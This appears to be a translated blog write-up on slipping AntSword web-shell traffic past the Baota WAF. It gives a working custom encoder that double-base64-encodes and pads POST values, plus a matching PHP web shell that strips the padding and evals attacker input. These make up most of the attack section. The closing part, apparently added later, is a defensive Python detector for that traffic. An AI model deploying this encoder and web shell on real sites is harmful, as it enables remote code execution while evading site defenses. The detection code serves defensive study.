Small ideas for bypassing a WAF

Preface

Recently, while studying a wave of CMS vulnerabilities on authorized targets, I ran into a few sites sitting behind the Baota ("pagoda") WAF… After getting back from WHOAMI I bypassed one more WAF, so I think it's time for a proper summary 🙂

Early attempts

The payload itself was blocked by the WAF as soon as it was sent, never mind the AntSword connection… 🙂

The WAF filters certain functions, so the payload cannot be used directly. We therefore need to obfuscate the traffic characteristics of AntSword.

A normal shell would look like this:


For example

If we base64-encode phpinfo(); and send it as the POST parameter, phpinfo executes normally.

But…

CMD command execution

But the shell connected through AntSword blew up…

We can also write phpinfo, but the AntSword connection throws an error. Why?

To understand this, let's first look at how AntSword's traffic works.

First, look at the structure of AntSword's base64 encoder:

```javascript
'use strict';
/**
 * @param {String} pwd  connection password
 * @param {Array}  data payload array before the encoder processes it
 * @return {Array} data payload array after the encoder processes it
 */
module.exports = (pwd, data, ext = {}) => {
  // ########## Write your own code below ##########
  // The following code is the PHP Base64 sample.
  // Generate a random variable name.
  let randomID = `_0x${Math.random().toString(16).substr(2)}`;
  // Base64-encode the original payload from data['_'] under the random name.
  data[randomID] = Buffer.from(data['_']).toString('base64');
  // The password parameter carries the stub that decodes and runs it.
  data[pwd] = `eval(base64_decode($_POST[${randomID}]));`;
  // ########## Write your own code above ##########
  // Delete the original payload.
  delete data['_'];
  // Return the payload array after the encoder has processed it.
  return data;
}
```

Explanation:

pwd: type String, the shell connection password

data: type Array, the HTTP POST packet to be sent

Buffer.from(data['_']).toString('base64') reads the code in data['_'] and base64-encodes it; data[pwd] is then passed to the server as a parameter, where it is decoded and executed as the shell code. Although the code in data['_'] is base64-encoded, data[pwd] is sent as a plain parameter, so data[pwd] is still transmitted in plaintext in the traffic.

Moreover, AntSword pads the encoded data with a random number of extra characters, but the characteristic string Y21k (the base64 encoding of cmd) is still present however many characters are added to the CMD command, so it will always be recognized.

So what can we do?


Decoder content:

```javascript
'use strict';

// Hex-encode every field; the original payload in data['_'] is moved under
// the password key.
module.exports = (pwd, data) => {
  let ret = {};
  for (let _ in data) {
    if (_ === '_') { continue; }
    ret[_] = Buffer.from(data[_]).toString('hex');
  }
  ret[pwd] = Buffer.from(data['_']).toString('hex');
  return ret;
}
```

Since AntSword already base64-encodes the data once by default, we can base64-encode it again and add extra characters to each value 🙂

Like this:

```javascript
// The post shows only this loop; it sits inside an encoder of the same shape
// as the one above. Each field is base64-encoded, then the fixed string
// 'andynoel1234' is prepended and appended to it.
module.exports = (pwd, data) => {
  let ret = {};
  for (let _ in data) {
    if (_ === '_') { continue; }
    ret[_] = Buffer.from(data[_]).toString('base64');
    ret[_] = 'andynoel1234' + ret[_];
    ret[_] += 'andynoel1234';
  }
  return ret;
}
```

At the same time, the shell we write can no longer be that simple, so it has to be modified accordingly:

```php
<?php
// Strip the 'andynoel1234' padding from every POST value and base64-decode it,
// then eval the code carried under the 'hack' password parameter.
foreach ($_POST as $k => $v) {
    $_POST[$k] = base64_decode(str_replace('andynoel1234', '', $v));
}
@eval($_POST['hack']);
?>
```

Capture the first POST and remove the extra value we added (the andynoel1234 above).

Base64-decode the remaining content twice; the AntSword connection then succeeds and CMD executes.
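To show what a WAF or log-analysis rule has to do to still catch the padded, double-encoded variant described above, here is an added detection example (not code from this post or from AntSword). It assumes form-encoded POST bodies, the andynoel1234 padding and hack password from the post, and a constructed _0xabc parameter name; beyond the post's single case, it derives the padding from the request itself as the prefix and suffix shared by all parameter values.

```python
import base64
import os
from urllib.parse import parse_qs, urlencode

# Markers of AntSword's default base64 encoder traffic once each base64 layer is
# peeled: the plaintext eval stub under the password parameter and the "Y21k"
# (base64 of "cmd") string the post mentions.
SIGNATURES = (b"eval(", b"$_POST[", b"base64_decode(", b"Y21k")

def shared_affix(values):
    """Longest prefix and suffix common to every value (empty if none)."""
    prefix = os.path.commonprefix(values)
    suffix = os.path.commonprefix([v[::-1] for v in values])[::-1]
    return prefix, suffix

def decode_layers(value, max_depth=3):
    """Peel strict base64 layers while each one decodes to printable ASCII."""
    layers = [value]
    for _ in range(max_depth):
        try:
            out = base64.b64decode(layers[-1], validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            break
        if not out or any(b > 0x7E or (b < 0x20 and b not in b"\r\n\t") for b in out):
            break
        layers.append(out)
    return layers

def inspect_post(body, strip_affix=True):
    """Scan a form-encoded POST body. Returns the affix shared by all parameter
    values and a list of (param, layer_depth, matched_signatures)."""
    params = {k: v[0].encode() for k, v in parse_qs(body, keep_blank_values=True).items()}
    prefix, suffix = shared_affix(list(params.values())) if len(params) > 1 else (b"", b"")
    hits = []
    for name, raw in params.items():
        val = raw[len(prefix):len(raw) - len(suffix)] if strip_affix else raw
        for depth, layer in enumerate(decode_layers(val)):
            found = [s.decode() for s in SIGNATURES if s in layer]
            if found:
                hits.append((name, depth, found))
                break
    return {"affix": (prefix, suffix), "hits": hits}

# Constructed sample requests (not real captures): the padding string and "hack"
# password are the post's; "_0xabc" stands in for AntSword's random parameter name.
PAD, STUB = "andynoel1234", "eval(base64_decode($_POST[_0xabc]));"
INNER = "$x=base64_decode('Y21k');echo $x;"  # constructed payload text
b64 = lambda s: base64.b64encode(s.encode()).decode()
DEFAULT_BODY = urlencode({"hack": STUB, "_0xabc": b64(INNER)})
PADDED_BODY = urlencode({"hack": PAD + b64(STUB) + PAD, "_0xabc": PAD + b64(b64(INNER)) + PAD})

if __name__ == "__main__":
    for body in (DEFAULT_BODY, PADDED_BODY):
        print(inspect_post(body, strip_affix=False)["hits"], inspect_post(body))
```

Run with strip_affix=False the padded body yields no hits, which is exactly the blind spot the post exploits; with the shared affix removed, both the eval stub and the Y21k marker reappear two layers down.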